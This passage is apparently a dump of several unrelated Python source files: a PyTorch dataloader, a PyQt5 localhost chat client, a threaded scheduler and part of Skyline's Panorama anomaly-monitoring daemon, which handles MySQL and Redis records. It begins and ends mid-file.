in res_dict.iteritems() if v[0] == False} print "FAILED PATCHES",str(len(failed_patches))+"/"+str(ntasks) for k,v in failed_patches: print k,v pickle.dump(res_dict,open(sys.argv[4],"wb")) #IPython.embed()
dataloader.py
import math import torch from dataset_file import DatasetFile from converter import ImageConverter, LabelConverter, FlexibleLabelConverter class CustomDataloader(object): def __init__(self, dataset='mnist.dataset', batch_size=16, fold='train', shuffle=True, last_batch=False, example_count=None, **kwargs): self.dsf = DatasetFile(dataset, example_count=example_count) self.img_conv = ImageConverter(self.dsf, **kwargs) self.lab_conv = LabelConverter(self.dsf, **kwargs) self.batch_size = batch_size self.fold = fold self.last_batch = last_batch self.shuffle = shuffle self.num_classes = self.lab_conv.num_classes self.image_tensor = None self.label_tensor = None def get_batch(self, **kwargs): batch = self.dsf.get_batch(fold=self.fold, batch_size=self.batch_size, **kwargs) images, labels = self.convert(batch) return images, labels def __iter__(self): batcher = self.dsf.get_all_batches( fold=self.fold, batch_size=self.batch_size, shuffle=self.shuffle, last_batch=self.last_batch) """ # TODO: Multithreading improves throughput by 10-20% # It must be implemented safely, however- not like this # In particular, ensure no deadlocks, interactivity and logging should still work import queue import threading q = queue.Queue(maxsize=1) def yield_batch_worker(): for batch in batcher: images, labels = self.convert(batch) q.put((images, labels)) q.put('finished') t = threading.Thread(target=yield_batch_worker) t.start() while True: result = q.get() if result == 'finished': break yield result t.join() """ for batch in batcher: images, labels = self.convert(batch) yield images, labels def convert(self, batch): images = self.img_conv(batch) labels = self.lab_conv(batch) images = torch.FloatTensor(images).cuda() labels = torch.LongTensor(labels).cuda() return images, labels def __len__(self): return math.floor(self.dsf.count(self.fold) / self.batch_size) def count(self): return self.dsf.count(self.fold) def class_name(self, idx): return self.lab_conv.labels[idx] class FlexibleCustomDataloader(CustomDataloader): def __init__(self, dataset='mnist.dataset', batch_size=16, fold='train', shuffle=True, last_batch=False, example_count=None, **kwargs): super().__init__(dataset, batch_size, fold, shuffle, last_batch, example_count, **kwargs) self.lab_conv = FlexibleLabelConverter(dataset=self.dsf, **kwargs) def convert(self, batch): images = self.img_conv(batch) labels = self.lab_conv(batch) images = torch.FloatTensor(images).cuda() labels = torch.FloatTensor(labels).cuda() return images, labels
guiplus.py
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui.ui' # # Created by: PyQt5 UI code generator 5.15.1 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. import os, sys, threading, time from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import QTextCursor from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QFileDialog from socket import * class Ui_main(QtWidgets.QMainWindow): def setupUi(self, main, port, usrname): main.setObjectName("main") main.setEnabled(True) main.resize(640, 443) main.setFixedSize(main.width(), main.height()) main.setMouseTracking(False) main.setStyleSheet("QWidget {\n" " background-color: #dcdcdc;\n" " font-family: \"Noto Serif SC\";\n" " font-weight: 500;\n" "}\n" "QPushButton {\n" " color: #dcdcdc;\n" " background-color: #262626;\n" " font-family: \"Noto Serif SC\";\n" " border-radius: 10px;\n" " border: 1px solid #262626;\n" "}\n" "QPushButton:hover {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #262626;\n" "}\n" "QPushButton:pressed {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #dcdcdc;\n" "}\n" "QToolButton {\n" " color: #dcdcdc;\n" " background-color: #262626;\n" " font-family: \"Noto Serif SC\";\n" " border-radius: 10px;\n" " border: 1px solid #262626;\n" "}\n" "QToolButton:hover {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #3f3f3f;\n" "}\n" "QToolButton:pressed {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #dcdcdc;\n" "}\n" "QTextBrowser {\n" " background-color: #f5f5f5;\n" " color: #262626;\n" " border-radius: 10px;\n" "}\n" "QLineEdit {\n" " background-color: #f5f5f5;\n" " color: #262626;\n" " text-indent: 10px;\n" " border-radius: 10px;\n" " padding-left: 10px;\n" "}\n" "QGraphicViews {\n" " background-image: url(\'./yjs.png\');\n" " background-size: 100% 100%;\n" "}\n" "QLabel {\n" " border-radius: 10px;\n" " background-color: #f5f5f5;\n" "}\n" "QScrollBar:vertical {\n" " width: 10px;\n" " border-radius: 5px;\n" " border-top-left-radius: 0px;\n" " border-bottom-left-radius: 0px;\n" " background: #f5f5f5;\n" " padding-top: 2px;\n" " padding-bottom: 2px; \n" "}\n" "QScrollBar::handle:vertical {\n" " background: #dcdcdc;\n" " width: 8px;\n" " border-radius: 4px;\n" " margin-left: 0px;\n" " margin-right: 2px;\n" "}\n" "QGraphicsView {\n" " border-image: url(./yjs.png);\n" # " background-size: 100% 100%;\n" "}" ) self.sendButton = QtWidgets.QPushButton(main) self.sendButton.setGeometry(QtCore.QRect(570, 400, 61, 31)) self.sendButton.setAutoDefault(False) self.sendButton.setDefault(False) self.sendButton.setFlat(True) self.sendButton.setObjectName("sendButton") self.chatMsg = QtWidgets.QTextBrowser(main) self.chatMsg.setGeometry(QtCore.QRect(10, 10, 511, 381)) self.chatMsg.setFrameShape(QtWidgets.QFrame.NoFrame) self.chatMsg.setFrameShadow(QtWidgets.QFrame.Plain) self.chatMsg.setLineWidth(1) self.chatMsg.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) self.chatMsg.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustIgnored) self.chatMsg.setOverwriteMode(True) self.chatMsg.setObjectName("chatMsg") self.inputMsg = QtWidgets.QLineEdit(main) self.inputMsg.setGeometry(QtCore.QRect(10, 400, 551, 31)) self.inputMsg.setText("") self.inputMsg.setFrame(False) self.inputMsg.setEchoMode(QtWidgets.QLineEdit.Normal) self.inputMsg.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.inputMsg.setCursorMoveStyle(QtCore.Qt.LogicalMoveStyle) self.inputMsg.setClearButtonEnabled(False) self.inputMsg.setObjectName("inputMsg") self.chatroomName = QtWidgets.QLabel(main) self.chatroomName.setGeometry(QtCore.QRect(530, 40, 101, 41)) self.chatroomName.setTextFormat(QtCore.Qt.AutoText) self.chatroomName.setAlignment(QtCore.Qt.AlignCenter) self.chatroomName.setWordWrap(True) self.chatroomName.setTextInteractionFlags(QtCore.Qt.NoTextInteraction) self.chatroomName.setObjectName(port) self.picsButton = QtWidgets.QToolButton(main) self.picsButton.setGeometry(QtCore.QRect(530, 330, 31, 22)) self.picsButton.setObjectName("picsButton") self.fileButton = QtWidgets.QToolButton(main) self.fileButton.setGeometry(QtCore.QRect(530, 360, 31, 22)) self.fileButton.setCheckable(False) self.fileButton.setChecked(False) self.fileButton.setAutoExclusive(False) self.fileButton.setObjectName("fileButton") self.graphicsView = QtWidgets.QGraphicsView(main) self.graphicsView.setGeometry(QtCore.QRect(530, 220, 101, 101)) self.graphicsView.setAutoFillBackground(False) self.graphicsView.setFrameShape(QtWidgets.QFrame.NoFrame) self.graphicsView.setFrameShadow(QtWidgets.QFrame.Plain) self.graphicsView.setLineWidth(0) brush = QtGui.QBrush(QtGui.QColor(0, 0, 0)) brush.setStyle(QtCore.Qt.NoBrush) self.graphicsView.setBackgroundBrush(brush) self.graphicsView.setInteractive(False) self.graphicsView.setObjectName("graphicsView") self.Name = QtWidgets.QLabel(main) self.Name.setGeometry(QtCore.QRect(530, 90, 101, 16)) self.Name.setAlignment(QtCore.Qt.AlignCenter) self.Name.setObjectName("Name") self.retranslateUi(main, port, usrname) self.sendButton.clicked.connect(self.sendMsg) self.picsButton.clicked.connect(self.showPicsMenu) self.fileButton.clicked.connect(self.showFileMenu) QtCore.QMetaObject.connectSlotsByName(main) def retranslateUi(self, main, port, usrname): _translate = QtCore.QCoreApplication.translate main.setWindowTitle(_translate("main", "Chat Room")) self.sendButton.setText(_translate("main", "Send")) self.chatMsg.setHtml(_translate("main", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Noto Serif SC\'; font-size:13pt; font-weight:496; font-style:normal;\">\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>")) self.chatMsg.setPlaceholderText(_translate("main", "Your History Msg HERE.")) self.inputMsg.setPlaceholderText(_translate("main", "Your Msg HERE.")) self.chatroomName.setText(_translate("main", port)) self.picsButton.setText(_translate("main", "Pics")) self.fileButton.setText(_translate("main", "File")) self.Name.setText(_translate("main", usrname)) def sendMsg(self): # while 1: # try: # yourSentMsg = str(self.inputMsg.text()) # if yourSentMsg != 'exit()' and yourSentMsg != '': # self.clientSocket.send(yourSentMsg.encode()) # else: # self.clientSocket.close() # break # except ConnectionResetError: # self.clientSocket.close() # break # os._exit(0) try: yourSentMsg = str(self.inputMsg.text()) if yourSentMsg != 'exit()': self.clientSocket.send(yourSentMsg.encode()) self.inputMsg.setText('') else: self.clientSocket.close() except ConnectionResetError: self.clientSocket.close() def recvMsg(self): while 1: try: receivedMsg = self.clientSocket.recv(20480) if receivedMsg.decode() != '': print(receivedMsg.decode()) self.chatMsg.append(receivedMsg.decode()) self.chatMsg.moveCursor(-1) if len(receivedMsg.decode()) > 5 and receivedMsg.decode()[-2] == 's' and receivedMsg.decode()[-1] == '!': self.Name.setText(str(receivedMsg.decode()).split(' ')[0]) except ConnectionResetError: self.clientSocket.close() self.chatMsg.append('Chatroom Closed.\nThis Window will close after 5 seconds.') time.sleep(1) self.chatMsg.append('This Window will close after 4 seconds.') time.sleep(1) self.chatMsg.append('This Window will close after 3 seconds.') time.sleep(1) self.chatMsg.append('This Window will close after 2 seconds.') time.sleep(1) self.chatMsg.append('This Window will close after 1 seconds.') time.sleep(1) print('Chatroom Closed.') # QtWidgets.QMessageBox.information(self, "Chatroom Closed.", "Chatroom Closed.") # ๆญคๅค„ๆŠฅ้”™ break self.close() def showPicsMenu(self): # QtWidgets.QMessageBox.information(self.picsButton, "pics", "pics") imgName, imgType = QFileDialog.getOpenFileName(self, "ๆ‰“ๅผ€ๅ›พ็‰‡", "", "*.jpg;;*.png;;All Files(*)") print(imgName, imgType) def showFileMenu(self): # QtWidgets.QMessageBox.information(self.fileButton, "file", "file") fileName, fileType = QFileDialog.getOpenFileName(self, "ๆ‰“ๅผ€ๆ–‡ไปถ", "", "*.txt;;*.md;;All Files(*)") # ;;*.doc;;*.docx fileContent = open(fileName, 'r').read() onlyname = fileName.split('/')[-1] file = '#################### - ' + onlyname + ' - ####################\n' + fileContent + '\n############################ - End - ############################' self.inputMsg.setText(file) print(fileName, fileType) def __init__(self, serverPort, usrname): super(Ui_main, self).__init__() serverName = "localhost" # serverPort = 9124 # serverPort = int(sys.argv[1]) port = "ChatRoom\n" + str(serverPort) self.clientSocket = socket(AF_INET, SOCK_STREAM) self.clientSocket.connect((serverName, serverPort)) self.setupUi(self, port, usrname) self.retranslateUi(self, port, usrname) print("The Client is READY to RECEIVE via TCP @", serverPort) print(self.clientSocket) threads = [threading.Thread(target=self.recvMsg), threading.Thread(target=self.sendMsg)] for t in threads: # self.chatMsg.moveToThread(t) # self.inputMsg.moveToThread(t) t.start() self.show() if __name__ == '__main__': app = QApplication(sys.argv) serverPort = int(sys.argv[1]) mainWindow = QMainWindow() ui = Ui_main(serverPort, 'Your Name') # ่ฟ™้‡Œ็š„ๅๅญ—ๅ‚่€ƒ็”Ÿๆˆ็š„py็š„็ฑปๅ # ui.setupUi(mainWindow, 'ChatRoom') # mainWindow.show() sys.exit(app.exec_())
schedule_every_n_sec.py
import time from threading import Thread class Scheduler: """ Every n seconds, start executing the given function. """ def __init__(self, n, function, *args, **kwargs): def target(): while self.flag: function(*args, **kwargs) time.sleep(n) self.flag = True self.thread = Thread(target=target) self.thread.start() def stop(self): """ Stop the new function calls from being scheduled. If the previous function has not yet completed, it will not be terminated. """ self.flag = False self.thread.join() scheduler = Scheduler(1, print, "It works") # wait 10 seconds and stop the scheduler time.sleep(10) scheduler.stop()
panorama.py
import logging try: from Queue import Empty except: from queue import Empty from time import time, sleep from threading import Thread # @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage # Use Redis sets in place of Manager().list() to reduce memory and number of # processes # from multiprocessing import Process, Manager from multiprocessing import Process import os from os import kill, getpid, listdir from os.path import join, isfile from ast import literal_eval from redis import StrictRedis from msgpack import Unpacker, packb import traceback from sys import version_info import mysql.connector from mysql.connector import errorcode # @added 20190502 - Branch #2646: slack from sqlalchemy.sql import select import settings from skyline_functions import fail_check, mkdir_p # @added 20170115 - Feature #1854: Ionosphere learn - generations # Added determination of the learn related variables so that any new metrics # that Panorama adds to the Skyline database, it adds the default # IONOSPHERE_LEARN_DEFAULT_ values or the namespace specific values matched # from settings.IONOSPHERE_LEARN_NAMESPACE_CONFIG to the metric database # entry. from ionosphere_functions import get_ionosphere_learn_details # @added 20190502 - Branch #2646: slack from database import get_engine, metrics_table_meta, anomalies_table_meta skyline_app = 'panorama' skyline_app_logger = '%sLog' % skyline_app logger = logging.getLogger(skyline_app_logger) skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app) skyline_app_loglock = '%s.lock' % skyline_app_logfile skyline_app_logwait = '%s.wait' % skyline_app_logfile python_version = int(version_info[0]) this_host = str(os.uname()[1]) # Converting one settings variable into a local variable, just because it is a # long string otherwise. try: ENABLE_PANORAMA_DEBUG = settings.ENABLE_PANORAMA_DEBUG except: logger.error('error :: cannot determine ENABLE_PANORAMA_DEBUG from settings') ENABLE_PANORAMA_DEBUG = False try: SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME if SERVER_METRIC_PATH == '.': SERVER_METRIC_PATH = '' except: SERVER_METRIC_PATH = '' # @added 20190523 - Branch #2646: slack try: SLACK_ENABLED = settings.SLACK_ENABLED except: SLACK_ENABLED = False skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH) failed_checks_dir = '%s_failed' % settings.PANORAMA_CHECK_PATH # @added 20160907 - Handle Panorama stampede on restart after not running #26 # Allow to expire check if greater than PANORAMA_CHECK_MAX_AGE, backwards # compatible try: test_max_age_set = 1 + settings.PANORAMA_CHECK_MAX_AGE if test_max_age_set > 1: max_age = True if test_max_age_set == 1: max_age = False max_age_seconds = settings.PANORAMA_CHECK_MAX_AGE except: max_age = False max_age_seconds = 0 expired_checks_dir = '%s_expired' % settings.PANORAMA_CHECK_PATH # Database configuration config = {'user': settings.PANORAMA_DBUSER, 'password': settings.PANORAMA_DBUSERPASS, 'host': settings.PANORAMA_DBHOST, 'port': settings.PANORAMA_DBPORT, 'database': settings.PANORAMA_DATABASE, 'raise_on_warnings': True} class Panorama(Thread): """ The Panorama class which controls the panorama thread and spawned processes. """ def __init__(self, parent_pid): """ Initialize Panorama Create the :obj:`mysql_conn` """ super(Panorama, self).__init__() # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() # @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage # Task #3032: Debug number of Python processes and memory use # Branch #3002: docker # Reduce amount of Manager instances that are used as each requires a # copy of entire memory to be copied into each subprocess so this # results in a python process per Manager instance, using as much # memory as the parent. OK on a server, not so much in a container. # Disabled all the Manager().list() below and replaced with Redis sets # self.anomalous_metrics = Manager().list() # self.metric_variables = Manager().list() self.mysql_conn = mysql.connector.connect(**config) def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) """ These are the panorama mysql functions used to surface and input panorama data for timeseries. """ def mysql_select(self, select): """ Select data from mysql database :param select: the select string :type select: str :return: tuple :rtype: tuple, boolean - **Example usage**:: query = 'select id, test from test' result = self.mysql_select(query) - **Example of the 0 indexed results tuple, which can hold multiple results**:: >> print('results: %s' % str(results)) results: [(1, u'test1'), (2, u'test2')] >> print('results[0]: %s' % str(results[0])) results[0]: (1, u'test1') .. note:: - If the MySQL query fails a boolean will be returned not a tuple * ``False`` * ``None`` """ try: cnx = mysql.connector.connect(**config) if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to mysql') except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to connect to mysql') return False if cnx: try: if ENABLE_PANORAMA_DEBUG: logger.info('debug :: %s' % (str(select))) cursor = cnx.cursor() query = ('%s' % (str(select))) cursor.execute(query) result = cursor.fetchall() cursor.close() cnx.close() return result except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to query database - %s' % (str(select))) try: cnx.close() return False except: return False else: if ENABLE_PANORAMA_DEBUG: logger.error('error :: failed to connect to mysql') # Close the test mysql connection try: cnx.close() return False except: return False return False def mysql_insert(self, insert): """ Insert data into mysql table :param select: the insert string :type select: str :return: int :rtype: int or boolean - **Example usage**:: query = 'insert into host (host) VALUES (\'this_host\')' result = self.mysql_insert(query) .. note:: - If the MySQL query fails a boolean will be returned not a tuple * ``False`` * ``None`` """ try: cnx = mysql.connector.connect(**config) if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to mysql') except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to connect to mysql') raise if cnx: try: cursor = cnx.cursor() cursor.execute(insert) inserted_id = cursor.lastrowid # Make sure data is committed to the database cnx.commit() cursor.close() cnx.close() return inserted_id except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('Failed to insert record') cnx.close() raise else: cnx.close() return False return False # @added 20170101 - Feature #1830: Ionosphere alerts # Bug #1460: panorama check file fails # Panorama check file fails #24 # Get rid of the skyline_functions imp as imp is deprecated in py3 anyway def new_load_metric_vars(self, metric_vars_file): """ Load the metric variables for a check from a metric check variables file :param metric_vars_file: the path and filename to the metric variables files :type metric_vars_file: str :return: the metric_vars module object or ``False`` :rtype: list """ if os.path.isfile(metric_vars_file): logger.info( 'loading metric variables from metric_check_file - %s' % ( str(metric_vars_file))) else: logger.error( 'error :: loading metric variables from metric_check_file - file not found - %s' % ( str(metric_vars_file))) return False metric_vars = [] with open(metric_vars_file) as f: for line in f: no_new_line = line.replace('\n', '') no_equal_line = no_new_line.replace(' = ', ',') array = str(no_equal_line.split(',', 1)) add_line = literal_eval(array) metric_vars.append(add_line) string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source'] float_keys = ['value'] int_keys = ['from_timestamp', 'metric_timestamp', 'added_at', 'full_duration'] array_keys = ['algorithms', 'triggered_algorithms'] boolean_keys = ['graphite_metric', 'run_crucible_tests'] metric_vars_array = [] for var_array in metric_vars: key = None value = None if var_array[0] in string_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = str(value_str) if var_array[0] == 'metric': metric = value if var_array[0] in float_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = float(value_str) if var_array[0] in int_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = int(value_str) if var_array[0] in array_keys: key = var_array[0] value = literal_eval(str(var_array[1])) if var_array[0] in boolean_keys: key = var_array[0] if str(var_array[1]) == 'True': value = True else: value = False if key: metric_vars_array.append([key, value]) if len(metric_vars_array) == 0: logger.error( 'error :: loading metric variables - none found' % ( str(metric_vars_file))) return False if settings.ENABLE_DEBUG: logger.info( 'debug :: metric_vars determined - metric variable - metric - %s' % str(metric_vars.metric)) logger.info('debug :: metric_vars for %s' % str(metric)) logger.info('debug :: %s' % str(metric_vars_array)) return metric_vars_array def update_slack_thread_ts(self, i, base_name, metric_timestamp, slack_thread_ts): """ Update an anomaly record with the slack_thread_ts. :param i: python process id :param metric_check_file: full path to the metric check file :return: returns True """ def get_an_engine(): try: engine, log_msg, trace = get_engine(skyline_app) return engine, log_msg, trace except: logger.error(traceback.format_exc()) log_msg = 'error :: update_slack_thread_ts :: failed to get MySQL engine in update_slack_thread_ts' logger.error('error :: update_slack_thread_ts :: failed to get MySQL engine in update_slack_thread_ts') return None, log_msg, trace def engine_disposal(engine): if engine: try: engine.dispose() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: calling engine.dispose()') return child_process_pid = os.getpid() logger.info('update_slack_thread_ts :: child_process_pid %s, processing %s, %s, %s' % ( str(child_process_pid), base_name, str(metric_timestamp), str(slack_thread_ts))) try: engine, log_msg, trace = get_an_engine() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not get a MySQL engine to update slack_thread_ts in anomalies for %s' % (base_name)) if not engine: logger.error('error :: update_slack_thread_ts :: engine not obtained to update slack_thread_ts in anomalies for %s' % (base_name)) return False try: metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine) logger.info(log_msg) logger.info('update_slack_thread_ts :: metrics_table OK') except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to get metrics_table meta for %s' % base_name) metric_id = None try: connection = engine.connect() stmt = select([metrics_table]).where(metrics_table.c.metric == base_name) result = connection.execute(stmt) for row in result: metric_id = int(row['id']) connection.close() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not determine metric id from metrics table') logger.info('update_slack_thread_ts :: metric id determined as %s' % str(metric_id)) if metric_id: try: anomalies_table, log_msg, trace = anomalies_table_meta(skyline_app, engine) logger.info(log_msg) logger.info('update_slack_thread_ts :: anomalies_table OK') except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to get anomalies_table meta for %s' % base_name) anomaly_id = None try: connection = engine.connect() stmt = select([anomalies_table]).\ where(anomalies_table.c.metric_id == metric_id).\ where(anomalies_table.c.anomaly_timestamp == metric_timestamp) result = connection.execute(stmt) for row in result: anomaly_id = int(row['id']) connection.close() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not determine anomaly id from anomaly table') logger.info('update_slack_thread_ts :: anomaly id determined as %s' % str(anomaly_id)) anomaly_record_updated = False if anomaly_id: try: connection = engine.connect() connection.execute( anomalies_table.update( anomalies_table.c.id == anomaly_id). values(slack_thread_ts=slack_thread_ts)) connection.close() logger.info('update_slack_thread_ts :: updated slack_thread_ts for anomaly id %s' % str(anomaly_id)) anomaly_record_updated = True except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not update slack_thread_ts for anomaly id %s' % str(anomaly_id)) if engine: try: engine_disposal(engine) except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not dispose engine') cache_key = 'panorama.slack_thread_ts.%s.%s' % (str(metric_timestamp), base_name) delete_cache_key = False if anomaly_record_updated: delete_cache_key = True if not anomaly_record_updated: # Allow for 60 seconds for an anomaly to be added now = time() anomaly_age = int(now) - int(metric_timestamp) if anomaly_age > 60: delete_cache_key = True if delete_cache_key: logger.info('update_slack_thread_ts :: deleting cache_key %s' % cache_key) try: self.redis_conn.delete(cache_key) logger.info('update_slack_thread_ts :: cache_key %s deleted' % cache_key) except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to delete cache_key %s' % cache_key) return def spin_process(self, i, metric_check_file): """ Assign a metric anomaly to process. :param i: python process id :param metric_check_file: full path to the metric check file :return: returns True """ child_process_pid = os.getpid() if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: child_process_pid - %s' % str(child_process_pid)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: processing metric check - %s' % metric_check_file) if not os.path.isfile(str(metric_check_file)): logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file))) return check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp) failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: failed_check_file - %s' % failed_check_file) # Load and validate metric variables try: # @modified 20170101 - Feature #1830: Ionosphere alerts # Bug #1460: panorama check file fails # Panorama check file fails #24 # Get rid of the skyline_functions imp as imp is deprecated in py3 anyway # Use def new_load_metric_vars(self, metric_vars_file): # metric_vars = load_metric_vars(skyline_app, str(metric_check_file)) metric_vars_array = self.new_load_metric_vars(str(metric_check_file)) except: logger.info(traceback.format_exc()) logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return # Test metric variables # We use a pythonic methodology to test if the variables are defined, # this ensures that if any of the variables are not set for some reason # we can handle unexpected data or situations gracefully and try and # ensure that the process does not hang. metric = None try: # metric_vars.metric # metric = str(metric_vars.metric) key = 'metric' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] metric = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - metric - %s' % metric) except: logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not metric: logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return value = None # @added 20171214 - Bug #2234: panorama metric_vars value check value_valid = None try: # metric_vars.value # value = str(metric_vars.value) key = 'value' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] value = float(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - value - %s' % (value)) # @added 20171214 - Bug #2234: panorama metric_vars value check value_valid = True except: logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return # @added 20171214 - Bug #2234: panorama metric_vars value check # If value was float of 0.0 then this was interpolated as not set # if not value: if not value_valid: # @added 20171214 - Bug #2234: panorama metric_vars value check # Added exception handling here logger.info(traceback.format_exc()) logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return from_timestamp = None try: # metric_vars.from_timestamp # from_timestamp = str(metric_vars.from_timestamp) key = 'from_timestamp' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] from_timestamp = int(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - from_timestamp - %s' % from_timestamp) except: # @added 20160822 - Bug #1460: panorama check file fails # Added exception handling here logger.info(traceback.format_exc()) logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not from_timestamp: logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return metric_timestamp = None try: # metric_vars.metric_timestamp # metric_timestamp = str(metric_vars.metric_timestamp) key = 'metric_timestamp' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] metric_timestamp = int(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - metric_timestamp - %s' % metric_timestamp) except: logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not metric_timestamp: logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return algorithms = None try: # metric_vars.algorithms # algorithms = metric_vars.algorithms key = 'algorithms' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] algorithms = value_list[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - algorithms - %s' % str(algorithms)) except: logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not algorithms: logger.error('error :: failed to load algorithms variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return triggered_algorithms = None try: # metric_vars.triggered_algorithms # triggered_algorithms = metric_vars.triggered_algorithms key = 'triggered_algorithms' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] triggered_algorithms = value_list[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms)) except: logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file)) 